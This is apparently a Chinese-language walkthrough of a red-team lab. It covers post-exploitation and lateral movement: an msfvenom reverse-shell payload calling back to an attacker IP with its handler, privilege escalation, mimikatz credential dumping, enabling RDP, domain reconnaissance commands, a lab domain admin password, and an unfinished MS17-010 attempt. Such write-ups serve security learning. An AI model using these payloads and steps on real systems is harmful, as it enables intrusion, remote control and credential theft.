1.後滲透。
之前我們已經將小馬上傳,在這裡用webshell進行進一步滲透。
1)基於msf
利用msf生成exe,並上傳。
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe
use exploit/multi/handler set payload windows/x64/meterpreter_reverse_tcp set lhost 192.168.248.128 set lport 1234 exploit
之後直接進行提權。
2)進行提權。
這裡使用者為admin,所以可以直接提到system。
3)獲取賬號密碼。
Windows系統下的hash密碼格式為: 使用者名稱稱:RID:LM-HASH值:NT-HASH值
例如:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
windows hash加密機制
- 先將使用者密碼轉換為十六進位制格式。
- 將十六進位制格式的密碼進行Unicode編碼。
- 使用MD4摘要演算法對Unicode編碼資料進行Hash計算
4)mimikatz
這裡主要利用mimikatz進行明文密碼的獲取
這裡不過多介紹,詳情可以參考這篇文章:
https://www.csdn.net/tags/Ntzacg2sMTE0NDUtYmxvZwO0O0OO0O0O.html
5)開啟3389埠
run post/windows/manage/enable_rdp
2.橫向滲透
1)資訊收集
ipconfig /all # 檢視本機ip,所在域 route print # 列印路由資訊 net view # 檢視區域網內其他主機名 arp -a # 檢視arp快取 net start # 檢視開啟了哪些服務 net share # 檢視開啟了哪些共享 net share ipc$ # 開啟ipc共享 net share c$ # 開啟c盤共享 net use \\192.168.xx.xx\ipc$ "" /user:"" # 與192.168.xx.xx建立空連線 net use \\192.168.xx.xx\c$ "密碼" /user:"使用者名稱" # 建立c盤共享 dir \\192.168.xx.xx\c$\user # 檢視192.168.xx.xx c盤user目錄下的檔案 net config Workstation # 檢視計算機名、全名、使用者名稱、系統版本、工作站、域、登入域 net user # 檢視本機使用者列表 net user /domain # 檢視域使用者 net localgroup administrators # 檢視本地管理員組(通常會有域使用者) net view /domain # 檢視有幾個域 net user 使用者名稱 /domain # 獲取指定域使用者的資訊 net group /domain # 檢視域裡面的工作組,檢視把使用者分了多少組(只能在域控上操作) net group 組名 /domain # 檢視域中某工作組 net group "domain admins" /domain # 檢視域管理員的名字 net group "domain computers" /domain # 檢視域中的其他主機名 net group "doamin controllers" /domain # 檢視域控制器(可能有多臺)
以上是一些常用指令。
大概收集的資訊為
域控為OWA$ 域管理員為Administrator 密碼為HONGRISEC@2019 內網網段為192.168.52.1/24
進入msf收集ip
共三個ip,其中192.168.52.143為win7
利用msf掃描192.168.52.141埠
192.168.52.138得到的資訊相同
因為兩者都開放445埠,採用ms17-010進行攻擊。
利用ms17-010時發現一個問題,不能直接利用,所以開啟3389,使用代理。
這裡因為個人環境的一些問題,沒有繼續下去,自己還是差很多東西,之後繼續努力吧。